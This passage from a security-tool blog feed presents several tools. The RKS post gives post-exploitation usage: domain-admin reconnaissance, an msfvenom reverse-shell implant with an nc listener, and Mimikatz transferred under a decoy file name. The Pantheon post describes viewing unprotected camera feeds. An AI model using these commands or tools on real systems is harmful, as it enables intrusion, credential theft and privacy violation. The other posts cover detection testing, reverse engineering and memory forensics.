WinFiHack</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71304122770715920032024-03-01T08:30:00.000-03:002024-03-01T08:30:00.125-03:00RKS - A Script To Automate Keystrokes Through A Graphical Desktop Program<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XDiXypTK-P_SJe6-IPlWn0NhMiHd3yskhfaVmlqOdirJRN54QZsmCsTXhRFK586TVOBTldBPZXoAsN5JKsnzvWalJT8meCNIRa8IlwhYjMR9HbicCtfYthEcraze2KNpzgDZMcCPeBuKcx-3WSXTQK2VMxHQtOKSp4O8sndz8hsFKH5lyXku-C5YePKU/s1271/RKS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="691" data-original-width="1271" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XDiXypTK-P_SJe6-IPlWn0NhMiHd3yskhfaVmlqOdirJRN54QZsmCsTXhRFK586TVOBTldBPZXoAsN5JKsnzvWalJT8meCNIRa8IlwhYjMR9HbicCtfYthEcraze2KNpzgDZMcCPeBuKcx-3WSXTQK2VMxHQtOKSp4O8sndz8hsFKH5lyXku-C5YePKU/w640-h348/RKS.png" width="640" /></a></div><p><br /></p> <p>A script to automate keystrokes through an active <a href="https://www.kitploit.com/search/label/Remote%20Desktop" target="_blank" title="remote desktop">remote desktop</a> session that assists offensive operators in combination with <a href="https://www.kitploit.com/search/label/Living%20Off%20The%20Land" target="_blank" title="living off the land">living off the land</a> techniques.</p> <br /><span style="font-size: large;"><b>About RKS (RemoteKeyStrokes)</b></span><br /> <p>All credits goes to <a href="https://github.com/nopernik" rel="nofollow" target="_blank" title="nopernik">nopernik</a> for making it possible so I took it upon myself to improve it. I wanted something that helps during the <a href="https://www.kitploit.com/search/label/Post%20Exploitation" target="_blank" title="post exploitation">post exploitation</a> phase when executing commands through a remote desktop.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Help Menu</b></span><br /> <pre><code>$ ./rks.sh -h<br />Usage: ./rks.sh (RemoteKeyStrokes)<br />Options:<br /> -c, --command <command | cmdfile> Specify a command or a file containing to execute<br /> -i, --input <input_file> Specify the local input file to transfer<br /> -o, --output <output_file> Specify the remote output file to transfer<br /> -m, --method <method> Specify the file transfer or execution method<br /> (For file transfer "base64" is set by default if<br /> not specified. For execution method "none" is set<br /> by default if not specified)<br /><br /> -p, --platform <operating_system> Specify the operating system (windows is set by<br /> default if not specified)<br /><br /> -w, --windowname <name> Specify t he window name for graphical remote<br /> program (freerdp is set by default if not<br /> specified)<br /><br /> -h, --help Display this help message<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <br /><b>Internal Reconnaissance</b><br /> <ul> <li>When running in command prompt</li> </ul> <pre><code>$ cat recon_cmds.txt<br />whoami /all<br />net user<br />net localgroup Administrators<br />net user /domain<br />net group "Domain Admins" /domain<br />net group "Enterprise Admins" /domain<br />net group "Domain Computers" /domain<br /><br />$ ./rks.h -c recon_cmds.txt<br /></code></pre> <br /><b>Execute Implant</b><br /> <ul> <li>Execute an implant while reading the contents of the payload in powershell.</li> </ul> <pre><code>$ msfvenom -p windowx/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1<br /><br />$ ./rks.sh -c implant.ps1<br /><br />$ nc -lvnp 4444<br /></code></pre> <br /><b>File Transfer</b><br /> <ul> <li>Transfer a file remotely when pivoting in a isolated network. If you want to specify the remote path on windows be sure to include quotes.</li> </ul> <pre><code>$ ./rks.sh -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1<br /><br />$ ./rks.sh -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64<br /></code></pre> <br /><b>Specify Grapical Remote Software</b><br /> <ul> <li>If you're targeting VNC network protocols you can specify the window name with <code>tightvnc</code>.</li> </ul> <p><code>$ ./rks.sh -i implant.ps1 -w tightvnc</code></p> <ul> <li>If you're targeting legacy operating systems with older RDP <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> specify the window name with <code>rdesktop</code>.</li> </ul> <p><code>$ ./rks.sh -i implant.bat -w rdesktop</code></p> <br /><span style="font-size: large;"><b>TODO and Help Wanted</b></span><br /> <ul> <li> <p>Add text colors for better user experience</p> </li> <li> <p>Implement Base64 file transfer</p> </li> <li> <p>Implement Bin2Hex file transfer</p> </li> <li> <p>Implement a persistence function for both windows and linux.</p> </li> <li> <p>Implement <a href="https://www.kitploit.com/search/label/Antiforensics" target="_blank" title="antiforensics">antiforensics</a> function for both windows and linux.</p> </li> <li> <p>Implement to read shellcode input and run C# implant and powershell runspace</p> </li> <li> <p>Implement privesc function for both windows and linux</p> </li> </ul> <br /><span style="font-size: large;"><b>References</b></span><br /> <ul> <li> <p><a href="https://www.youtube.com/watch?v=8YFEujJUxws" rel="nofollow" target="_blank" title="Video: sethc.exe Backdoor CMD Payload delivery (USB Rubber Ducky style)">Video: sethc.exe Backdoor CMD Payload delivery (USB Rubber Ducky style)</a></p> </li> <li> <p><a href="https://github.com/nopernik/mytools/blob/master/rdp-cmd-delivery.sh" rel="nofollow" target="_blank" title="Original Script">Original Script</a></p> </li> <li> <p><a href="https://github.com/ztgrace/sticky_keys_hunter" rel="nofollow" target="_blank" title="sticky_keys_hunter">sticky_keys_hunter</a></p> </li> </ul> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li><a href="https://github.com/nopernik" rel="nofollow" target="_blank" title="nopernik">nopernik</a></li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/U53RW4R3/RKS" rel="nofollow" target="_blank" title="Download RKS">Download RKS</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-38848302592317033582024-01-30T08:30:00.000-03:002024-01-30T08:30:00.123-03:00PurpleKeep - Providing Azure Pipelines To Create An Infrastructure And Run Atomic Tests<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo"><img alt="" border="0" height="258" id="BLOGGER_PHOTO_ID_7310071996835853026" src="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo=w640-h258" width="640" /></a></p><div><br /></div> <p dir="auto">With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.</p> <p dir="auto">To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the <a href="https://www.kitploit.com/search/label/Automated%20Testing" target="_blank" title="automated testing">automated testing</a> of detection rules. Leveraging the capabilities of the <a href="https://atomicredteam.io" rel="nofollow" target="_blank" title="Atomic Red Team project">Atomic Red Team project</a> which allows to simulate attacks following <a href="https://attack.mitre.org/" rel="nofollow" target="_blank" title="MITRE TTPs">MITRE TTPs</a> (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the <a href="https://www.kitploit.com/search/label/Evaluation" target="_blank" title="evaluation">evaluation</a> of the effectiveness of detection rules.</p> <p dir="auto">Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and <a href="https://www.kitploit.com/search/label/Instrumentation" target="_blank" title="instrumentation">instrumentation</a> of the targeted platform.</p> <p dir="auto">Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.</p> <p dir="auto">To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.</p> <p dir="auto">TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Requirements</h2> <p dir="auto">The project is based on Azure Pipelines and requires the following to be able to run:</p> <ul dir="auto"> <li>Azure Service Connection to a resource group as described in the <a href="https://learn.microsoft.com/en-us/azure/devops/pipelines/library/service-endpoints?view=azure-devops&tabs=yaml" rel="nofollow" target="_blank" title="Microsoft Docs">Microsoft Docs</a></li> <li>Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application</li> <li>MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and make it accessible to the pipelines</li> </ul> <h3 dir="auto" tabindex="-1">Optional</h3> <p dir="auto">You can provide a security and/or audit policy file that will be loaded to mimic your <a href="https://www.kitploit.com/search/label/Group%20Policy" target="_blank" title="Group Policy">Group Policy</a> configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.</p> <p dir="auto">Refer to the <a href="https://github.com/Retrospected/PurpleKeep/blob/main/variables.yml" rel="nofollow" target="_blank" title="variables">variables</a> file for your configurable items.</p> <h2 dir="auto" tabindex="-1">Design</h2> <p dir="auto" style="text-align: center;"><a href="https://github.com/Retrospected/PurpleKeep/blob/main/docs/PurpleKeep_1.0.jpg" rel="nofollow" target="_blank" title="Providing Azure pipelines to create an infrastructure and run Atomic tests. (9)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo"><img alt="" border="0" height="258" id="BLOGGER_PHOTO_ID_7310071996835853026" src="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo=w640-h258" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Infrastructure</h2> <p dir="auto">Deploying the <a href="https://www.kitploit.com/search/label/Infrastructure" target="_blank" title="infrastructure">infrastructure</a> uses the Azure Pipeline to perform the following steps:</p> <ul dir="auto"> <li>Deploy Azure services: <ul dir="auto"> <li>Key Vault</li> <li>Log Analytics Workspace</li> <li>Data Connection Endpoint</li> <li>Data Connection Rule</li> </ul> </li> <li>Generate SSH keypair and password for the Windows account and store in the Key Vault</li> <li>Create a Windows 11 VM</li> <li>Install OpenSSH</li> <li>Configure and deploy the SSH public key</li> <li>Install Invoke-AtomicRedTeam</li> <li>Install Microsoft Defender for Endpoint and configure exceptions</li> <li>(Optional) Apply security and/or audit policy files</li> <li>Reboot</li> </ul> <h2 dir="auto" tabindex="-1">Simulation</h2> <p dir="auto">Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:</p> <ul dir="auto"> <li>T1059.003</li> <li>T1027,T1049,T1003</li> </ul> <p dir="auto">The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.</p> <p dir="auto">There are currently two ways to run the simulation:</p> <h3 dir="auto" tabindex="-1"><a href="https://github.com/Retrospected/PurpleKeep/blob/main/rotate_simulation.yml" rel="nofollow" target="_blank" title="Rotating simulation">Rotating simulation</a></h3> <p dir="auto">This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.</p> <p dir="auto"><strong>Warning: this will onboard a large number of hosts into your EDR</strong></p> <h3 dir="auto" tabindex="-1"><a href="https://github.com/Retrospected/PurpleKeep/blob/main/single_deploy_simulation.yml" rel="nofollow" target="_blank" title="Single deploy simulation">Single deploy simulation</a></h3> <p dir="auto">A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.</p> <h2 dir="auto" tabindex="-1">TODO</h2> <h3 dir="auto" tabindex="-1">Must have</h3> <ul class="contains-task-list"> <li class="task-list-item">Check if pre-reqs have been fullfilled before executing the atomic</li> <li class="task-list-item">Provide the ability to import own group policy</li> <li class="task-list-item">Cleanup biceps and pipelines by using a master template (Complete build)</li> <li class="task-list-item">Build pipeline that runs technique sequently with reboots in between</li> <li class="task-list-item">Add Azure ServiceConnection to variables instead of parameters</li> </ul> <h3 dir="auto" tabindex="-1">Nice to have</h3> <ul class="contains-task-list"> <li class="task-list-item">MDE Off-boarding (?)</li> <li class="task-list-item">Automatically join and leave AD domain</li> <li class="task-list-item">Make Atomics repository configureable</li> <li class="task-list-item">Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the <a data-hovercard-type="issue" data-hovercard-url="/SecurityRiskAdvisors/VECTR/issues/235/hovercard" href="https://github.com/SecurityRiskAdvisors/VECTR/issues/235" rel="nofollow" target="_blank" title="VECTR API issue">VECTR API issue</a></li> <li class="task-list-item">Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)</li> <li class="task-list-item">Add C2 infrastructure for manual or C2 based simulations</li> </ul> <h2 dir="auto" tabindex="-1">Issues</h2> <ul class="contains-task-list"> <li class="task-list-item">Atomics do not return if a simulation succeeded or not</li> <li class="task-list-item">Unreliable OpenSSH extension installer failing infrastructure deployment</li> <li class="task-list-item">Spamming onboarded devices in the EDR</li> </ul> <h2 dir="auto" tabindex="-1">References</h2> <ul dir="auto"> <li><a href="https://github.com/splunk/attack_range" rel="nofollow" target="_blank" title="Splunk's Attack Range">Splunk's Attack Range</a></li> <li><a href="https://vimeo.com/819912016/c76af1ca39" rel="nofollow" target="_blank" title="Sp4rkCon 2023 - Continuous End-to-End Detection Validation and Reporting with Carrie Roberts">Sp4rkCon 2023 - Continuous End-to-End Detection Validation and Reporting with Carrie Roberts</a></li> <li><a href="https://redcanary.com/blog/coalmine/" rel="nofollow" target="_blank" title="Red Canary's Coalmine">Red Canary's Coalmine</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Retrospected/PurpleKeep" rel="nofollow" target="_blank" title="Download PurpleKeep">Download PurpleKeep</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-25481858831683682712024-01-01T08:30:00.001-03:002024-01-01T08:30:00.128-03:00Pantheon - Insecure Camera Parser <p></p><p></p><p align="center" dir="auto"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgphk4FdTXXRSuqk9kNCkaUGmigdJBqDOelPWlALWTirguZ8aVeDlAhQsGKmYVBJXM7DLD2eZ64BUr_mlnN0B1NFuok6RQ-fD35dp_0aZJMDD1dhCmQUY8l-W1hLAiqbM2qoBNPKIe9Pc-Pdq2EDp2O7gHr-oZthvh1cvMEeq5TY5DN3Di9yF-VzpLoietS"><img alt="" border="0" height="292" id="BLOGGER_PHOTO_ID_7315978546647309346" src="https://blogger.googleusercontent.com/img/a/AVvXsEgphk4FdTXXRSuqk9kNCkaUGmigdJBqDOelPWlALWTirguZ8aVeDlAhQsGKmYVBJXM7DLD2eZ64BUr_mlnN0B1NFuok6RQ-fD35dp_0aZJMDD1dhCmQUY8l-W1hLAiqbM2qoBNPKIe9Pc-Pdq2EDp2O7gHr-oZthvh1cvMEeq5TY5DN3Di9yF-VzpLoietS=w640-h292" width="640" /></a></p><p align="center" dir="auto"><br /></p> <p dir="auto">Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.</p> <h3 dir="auto" tabindex="-1">Functionalities</h3> <p dir="auto">Pantheon allows users to execute an <strong>API</strong> crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Installation</h2> <ol dir="auto"> <li><code>git clone https://github.com/josh0xA/Pantheon.git</code></li> <li><code>cd Pantheon</code></li> <li><code>pip3 install -r requirements.txt</code><br /> Execution: <code>python3 pantheon.py</code></li> </ol> <ul dir="auto"> <li>Note: I will later add a GUI installer to make it fully indepenent of a CLI</li> </ul> <h3 dir="auto" tabindex="-1">Windows</h3> <ul dir="auto"> <li>You can just follow the steps above or download the official package <a href="https://joshschiavone.com/" rel="nofollow" target="_blank" title="here">here</a>.</li> <li>Note, the PE binary of Pantheon was put together using pyinstaller, so <a href="https://www.kitploit.com/search/label/Windows%20Defender" target="_blank" title="Windows Defender">Windows Defender</a> might get a bit upset.</li> </ul> <h3 dir="auto" tabindex="-1">Ubuntu</h3> <ul dir="auto"> <li>First, complete steps 1, 2 and 3 listed above. <br /></li> <li><code>chmod +x distros/ubuntu_install.sh</code></li> <li><code>./distros/ubuntu_install.sh</code></li> </ul> <h3 dir="auto" tabindex="-1">Debian and Kali Linux</h3> <ul dir="auto"> <li>First, complete steps 1, 2 and 3 listed above. <br /></li> <li><code>chmod +x distros/debian-kali_install.sh</code></li> <li><code>./distros/debian-kali_install.sh</code></li> </ul> <h3 dir="auto" tabindex="-1">MacOS</h3> <ul dir="auto"> <li>The regular installation steps above should suffice. If not, open up an issue.</li> </ul> <h2 dir="auto" tabindex="-1">Usage</h2> <p align="center" dir="auto"> <a href="https://github.com/josh0xA/Pantheon/blob/main/imgs/pantheon_second_example.PNG" rel="nofollow" target="_blank" title="Pantheon - Insecure Camera Parser (4)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgphk4FdTXXRSuqk9kNCkaUGmigdJBqDOelPWlALWTirguZ8aVeDlAhQsGKmYVBJXM7DLD2eZ64BUr_mlnN0B1NFuok6RQ-fD35dp_0aZJMDD1dhCmQUY8l-W1hLAiqbM2qoBNPKIe9Pc-Pdq2EDp2O7gHr-oZthvh1cvMEeq5TY5DN3Di9yF-VzpLoietS"><img alt="" border="0" height="292" id="BLOGGER_PHOTO_ID_7315978546647309346" src="https://blogger.googleusercontent.com/img/a/AVvXsEgphk4FdTXXRSuqk9kNCkaUGmigdJBqDOelPWlALWTirguZ8aVeDlAhQsGKmYVBJXM7DLD2eZ64BUr_mlnN0B1NFuok6RQ-fD35dp_0aZJMDD1dhCmQUY8l-W1hLAiqbM2qoBNPKIe9Pc-Pdq2EDp2O7gHr-oZthvh1cvMEeq5TY5DN3Di9yF-VzpLoietS=w640-h292" width="640" /></a> </p> <p dir="auto">(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk) <br /></p> <p dir="auto">(Left-click) on a selected IP:Port to view the <a href="https://www.kitploit.com/search/label/Geolocation" target="_blank" title="geolocation">geolocation</a> of the camera. <br /> (Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac). <br /></p> <p dir="auto">Adjust the map as you please to see the markers. <br /></p> <ul dir="auto"> <li>Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login). <br /></li> </ul> <h2 dir="auto" tabindex="-1">Ethical Notice</h2> <p dir="auto">The developer of this program, Josh Schiavone, is not resposible for misuse of this data <a href="https://www.kitploit.com/search/label/Gathering" target="_blank" title="gathering">gathering</a> tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: <a href="https://joshschiavone.com/panth_info/panth_ethical_notice.html" rel="nofollow" target="_blank" title="https://joshschiavone.com/panth_info/panth_ethical_notice.html">https://joshschiavone.com/panth_info/panth_ethical_notice.html</a></p> <h2 dir="auto" tabindex="-1">Licence</h2> <p dir="auto">MIT License<br /> Copyright (c) Josh Schiavone</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/josh0xA/Pantheon" rel="nofollow" target="_blank" title="Download Pantheon">Download Pantheon</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-49260557703718246712023-12-26T08:30:00.000-03:002023-12-26T08:30:00.137-03:00Blutter - Flutter Mobile Application Reverse Engineering Tool<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidYuhjCM7NAF2rGB8-Xdky3n7100X9ILzInvyw88fO-rWx6KAPv3ZAT2rINyQHcB65R4SspEjrwwyUIUR2KPbK0URI89ulDwcMDEUaVwb_eMlPspM0mCd2C26JFYe8RqeMLP_DmdAXc2WSfVGKSUOZClXbDbACBRK-IDOcNoEf2Xdvm1OHCnu0Zf6NNW1p/s1792/Blutter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidYuhjCM7NAF2rGB8-Xdky3n7100X9ILzInvyw88fO-rWx6KAPv3ZAT2rINyQHcB65R4SspEjrwwyUIUR2KPbK0URI89ulDwcMDEUaVwb_eMlPspM0mCd2C26JFYe8RqeMLP_DmdAXc2WSfVGKSUOZClXbDbACBRK-IDOcNoEf2Xdvm1OHCnu0Zf6NNW1p/w640-h366/Blutter.png" width="640" /></a></div><p><br /></p> <p dir="auto">Flutter Mobile Application <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="Reverse Engineering">Reverse Engineering</a> Tool by Compiling Dart AOT Runtime</p> <p dir="auto">Currently the application supports only Android libapp.so (arm64 only). Also the application is currently work only against recent Dart versions.</p> <p dir="auto">For high priority missing features, see <a href="https://github.com/worawit/blutter#todo" rel="nofollow" target="_blank" title="TODO">TODO</a></p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Environment Setup</h2> <p dir="auto">This application uses C++20 Formatting library. It requires very recent C++ <a href="https://www.kitploit.com/search/label/Compiler" target="_blank" title="compiler">compiler</a> such as g++>=13, Clang>=15.</p> <p dir="auto">I recommend using Linux OS (only tested on Deiban sid/trixie) because it is easy to setup.</p> <h3 dir="auto" tabindex="-1">Debian Unstable (gcc 13)</h3> <ul dir="auto"> <li>Install build tools and depenencies</li> </ul> <div><pre><code>apt install python3-pyelftools python3-requests git cmake ninja-build \<br /> build-essential pkg-config libicu-dev libcapstone-dev<br /></code></pre></div> <h3 dir="auto" tabindex="-1">Windows</h3> <ul dir="auto"> <li>Install git and python 3</li> <li>Install latest Visual Studio with "Desktop development with C++" and "C++ CMake tools"</li> <li>Install required libraries (libcapstone and libicu4c)</li> </ul> <div><pre><code>python scripts\init_env_win.py<br /></code></pre></div> <ul dir="auto"> <li>Start "x64 Native Tools Command Prompt"</li> </ul> <h3 dir="auto" tabindex="-1">macOS Ventura (clang 15)</h3> <ul dir="auto"> <li>Install XCode</li> <li>Install clang 15 and required tools</li> </ul> <div><pre><code>brew install llvm@15 cmake ninja pkg-config icu4c capstone<br />pip3 install pyelftools requests<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">Extract "lib" <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> from apk file</p> <div><pre><code>python3 blutter.py path/to/app/lib/arm64-v8a out_dir<br /></code></pre></div> <p dir="auto">The blutter.py will automatically detect the Dart version from the flutter engine and call executable of blutter to get the information from libapp.so.</p> <p dir="auto">If the blutter executable for required Dart version does not exists, the script will automatically checkout Dart source code and compiling it.</p> <h2 dir="auto" tabindex="-1">Update</h2> <p dir="auto">You can use <code>git pull</code> to update and run blutter.py with <code>--rebuild</code> option to force rebuild the executable</p> <div><pre><code>python3 blutter.py path/to/app/lib/arm64-v8a out_dir --rebuild<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Output files</h2> <ul dir="auto"> <li><strong>asm/*</strong> libapp <a href="https://www.kitploit.com/search/label/Assemblies" target="_blank" title="assemblies">assemblies</a> with symbols</li> <li><strong>blutter_frida.js</strong> the frida script template for the target application</li> <li><strong>objs.txt</strong> complete (nested) dump of Object from Object Pool</li> <li><strong>pp.txt</strong> all Dart objects in Object Pool</li> </ul> <h2 dir="auto" tabindex="-1">Directories</h2> <ul dir="auto"> <li><strong>bin</strong> contains blutter executables for each Dart version in "blutter_dartvm<ver>_<os>_<arch>" format</li> <li><strong>blutter</strong> contains source code. need building against Dart VM library</li> <li><strong>build</strong> contains building projects which can be deleted after finishing the build process</li> <li><strong>dartsdk</strong> contains checkout of Dart Runtime which can be deleted after finishing the build process</li> <li><strong>external</strong> contains 3rd party libraries for Windows only</li> <li><strong>packages</strong> contains the static libraries of Dart Runtime</li> <li><strong>scripts</strong> contains <a href="https://www.kitploit.com/search/label/Python%20Scripts" target="_blank" title="python scripts">python scripts</a> for getting/building Dart</li> </ul> <h2 dir="auto" tabindex="-1">Generating Visual Studio Solution for Development</h2> <p dir="auto">I use Visual Studio to delevlop Blutter on Windows. <code>--vs-sln</code> options can be used to generate a Visual Studio solution.</p> <div><pre><code>python blutter.py path\to\lib\arm64-v8a build\vs --vs-sln<br /></code></pre></div> <h2 dir="auto" tabindex="-1">TODO</h2> <ul dir="auto"> <li>More code analysis <ul dir="auto"> <li>Function arguments and return type</li> <li>Some psuedo code for code pattern</li> </ul> </li> <li>Generate better Frida script <ul dir="auto"> <li>More internal classes</li> <li>Object modification</li> </ul> </li> <li>Obfuscated app (still missing many functions)</li> <li>Reading iOS binary</li> <li>Input as apk or ipa</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/worawit/blutter" rel="nofollow" target="_blank" title="Download Blutter">Download Blutter</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-58558857672420664422023-12-21T08:30:00.001-03:002023-12-21T08:30:00.246-03:00Linpmem - A Physical Memory Acquisition Tool For Linux<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU88JYCLtHU7jCBmaWLCv3frl18MUaf3X7W_S8ocss7Vxvhm7JDU8-4zv3AvMKJpRox4kX9UhCmHWn20G1DhIjYEEUH5y8Zl7MgURGLycQxM3lRcEtcELqRKv2v9DI3w0AFJpk9lKoW4BltwWtZ2ZKTekKJru7sMuiQf-QhZIjtFAnQIdslfXZrQsU72v9/s1792/Linpmem.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU88JYCLtHU7jCBmaWLCv3frl18MUaf3X7W_S8ocss7Vxvhm7JDU8-4zv3AvMKJpRox4kX9UhCmHWn20G1DhIjYEEUH5y8Zl7MgURGLycQxM3lRcEtcELqRKv2v9DI3w0AFJpk9lKoW4BltwWtZ2ZKTekKJru7sMuiQf-QhZIjtFAnQIdslfXZrQsU72v9/w640-h366/Linpmem.png" width="640" /></a></div><p style="text-align: center;"><br /></p><p dir="auto">Like its Windows counterpart, <a href="https://github.com/Velocidex/WinPmem" rel="nofollow" target="_blank" title="Winpmem">Winpmem</a>, this is not a traditional memory dumper. Linpmem offers an API for reading from <em>any</em> physical address, including <em>reserved memory</em> and <em>memory holes</em>, but it can also be used for normal memory dumping. Furthermore, the driver offers a variety of access modes to read physical memory, such as byte, word, dword, qword, and buffer access mode, where buffer access mode is appropriate in most standard cases. If reading requires an aligned byte/word/dword/qword read, Linpmem will do precisely that.</p> <p dir="auto">Currently, the Linpmem features:</p> <ol dir="auto"> <li>Read from physical address (access mode byte, word, dword, qword, or buffer)</li> <li>CR3 info service (specify target process by pid)</li> <li>Virtual to physical address translation service</li> </ol> <p dir="auto">Cache Control is to be added in future for support of the specialized read access modes.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Building the kernel driver</h2> <p dir="auto"><em>At least for now</em>, you must compile the Linpmem driver yourself. A method to load a precompiled Linpmem driver on other Linux systems is currently under work, but not finished yet. That said, compiling the Linpmem driver is not difficult, basically it's executing 'make'.</p> <h3 dir="auto" tabindex="-1">Step 1 - getting the right headers</h3> <p dir="auto">You need <code>make</code> and a C compiler. (We recommend gcc, but clang should work as well).</p> <p dir="auto">Make sure that you have the <code>linux-headers</code> installed (using whatever package manager your target linux distro has). The exact package name may vary on your distribution. A quick (distro-independent) way to check if you have the package installed:</p> <div><pre><code>ls -l /usr/lib/modules/`uname -r`/<br /></code></pre></div> <p dir="auto">That's it, you can proceed to step 2.</p> <p dir="auto"><strong>Foreign system:</strong> <em>Currently</em>, if you want to compile the driver for <em>another</em> system, e.g., because 